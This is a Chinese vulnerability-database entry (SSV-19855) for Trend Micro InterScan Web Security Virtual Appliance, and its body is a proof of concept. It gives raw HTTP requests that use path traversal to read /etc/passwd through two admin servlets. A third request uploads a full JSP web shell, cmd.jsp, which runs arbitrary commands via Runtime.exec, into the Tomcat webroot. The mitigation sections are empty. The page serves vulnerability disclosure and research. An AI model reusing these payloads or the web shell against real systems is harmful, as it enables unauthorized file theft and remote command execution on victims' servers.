InterScan Web Security Virtual Appliance本地权限提升和任意文件上传/下载漏洞

基本字段

漏洞编号：: SSV-19855

披露/发现时间：: 未知

提交时间：: 2010-06-25

漏洞等级：

漏洞类别：: 本地溢出

影响组件：: TrendMicro Control Manger
(5)

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者 Knownsec 共获得 0KB

共 0 兑换了

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得 0.2KB

POST /servlet/com.trend.iwss.gui.servlet.exportreport HTTP/1.1 Host: xxx.xxx.xx.xx:1812 User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://xxx.xxx.xx.xx:1812/summary_threat.jsp Cookie: JSESSIONID=D122F55EA4D2A5FA1E7AE4582085F370 Content-Type: application/x-www-form-urlencoded Content-Length: 99 op=refresh&summaryinterval=7&exportname=../../../../../../../../../../etc/passwd&exportfilesize=443 POST /servlet/com.trend.iwss.gui.servlet.ConfigBackup?action=download HTTP/1.1 Host: xx.xx.xx.xx:1812 User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://xx.xx.xx.xx:1812/config_backup_result.jsp?op=export Cookie: JSESSIONID=D122F55EA4D2A5FA1E7AE4582085F370 Content-Type: application/x-www-form-urlencoded Content-Length: 46 op=2&ImEx_success=1&pkg_name=/etc/passwd%0D%0A POST /servlet/com.trend.iwss.gui.servlet.XMLRPCcert?action=import HTTP/1.1 Host: xx.xx.xx.xx:1812 User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://xx.xx.xx.xx:1812 Cookie: JSESSIONID=9072F5BC86BD450CFD8B88613FFD2F80 Content-Type: multipart/form-data; boundary=---------------------------80377104394420410598722900 Content-Length: 2912 -----------------------------80377104394420410598722900 Content-Disposition: form-data; name="op" save -----------------------------80377104394420410598722900 Content-Disposition: form-data; name="defaultca" yes -----------------------------80377104394420410598722900 Content-Disposition: form-data; name="importca_certificate"; filename="../../../../../../../../../../../../../../../../../usr/iwss/AdminUI/tomcat/webapps/ROOT/cmd.jsp" Content-Type: application/octet-stream <%@ page import="java.util.*,java.io.*"%> <%%> <HTML><BODY> <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="cmd"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "<BR>"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %> </pre> </BODY></HTML> -----------------------------80377104394420410598722900 Content-Disposition: form-data; name="importca_key"; filename="../../../../../../../../../../../../../../../../../usr/iwss/AdminUI/tomcat/webapps/ROOT/cmd.jsp" <%@ page import="java.util.*,java.io.*"%> <%%> <HTML><BODY> <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="cmd"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "<BR>"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %> </pre> </BODY></HTML> -----------------------------80377104394420410598722900 Content-Disposition: form-data; name="importca_passphrase" test -----------------------------80377104394420410598722900 Content-Disposition: form-data; name="importca_2passphrase" test -----------------------------80377104394420410598722900 Content-Disposition: form-data; name="beErrMsg" imperr -----------------------------80377104394420410598722900--

共 3 兑换

参考链接

解决方案

临时解决方案

官方解决方案

防护方案

※本站提供的任何内容、代码与服务仅供学习，请勿用于非法用途，否则后果自负

InterScan Web Security Virtual Appliance本地权限提升和任意文件上传/下载漏洞

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

InterScan Web Security Virtual Appliance本地权限提升和任意文件上传/下载漏洞

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定